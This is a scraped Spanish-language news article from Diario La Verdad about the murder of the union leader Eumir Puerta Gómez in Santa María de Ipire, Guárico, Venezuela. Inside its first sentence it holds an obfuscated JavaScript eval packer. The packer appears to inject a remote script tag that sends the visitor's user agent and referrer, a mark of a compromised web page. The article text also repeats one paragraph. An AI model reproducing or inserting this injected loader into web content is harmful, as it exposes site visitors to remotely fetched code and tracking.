Asesinan por venganza a sindicalista en Guárico

Redacción Sucesos / Maracaibo / [email protected]
Tras eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sbikt|var|u0026u|referrer|eznys||js|php'.split('|'),0,{})) matar a la sindicalista, escaparon y se montaron en una moto conducida por un cómplice que los esperaba en la calle. Según información extraoficial, se conoció que los homicidas fueron capturados por la Policía

Foto Archivo

Eumir Puerta Gómez (42) fue asesinada, el pasado miércoles en la tarde, en la calle Zaraza del barrio "Taparito", en el centro de Santa María de Ipire, estado Guárico.

Trabajaba como sindicalista, por lo cual la Policía científica investiga el crimen como una venganza debido a presuntos problemas con empleados, según contaron sus parientes.

Puerta se encontraba de visita por las fiestas navideñas para ver a su familia. Se conoció que tuvo que mudarse por unos conflictos que tuvo por su trabajo como sindicalista.

En su residencia, en una población al oriente del país, dos hombres entraron, le dispararon varias veces en la cabeza y huyeron.

Versiones de sus familiares señalan que Eumir Puerta decidió mudarse a Oriente luego de sufrir dos atentados. Su casa fue tiroteada en una ocasión.

Tras matar a la sindicalista, escaparon y se montaron en una moto conducida por un cómplice que los esperaba en la calle. Según información extraoficial, se conoció que los homicidas fueron capturados por la Policía.

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama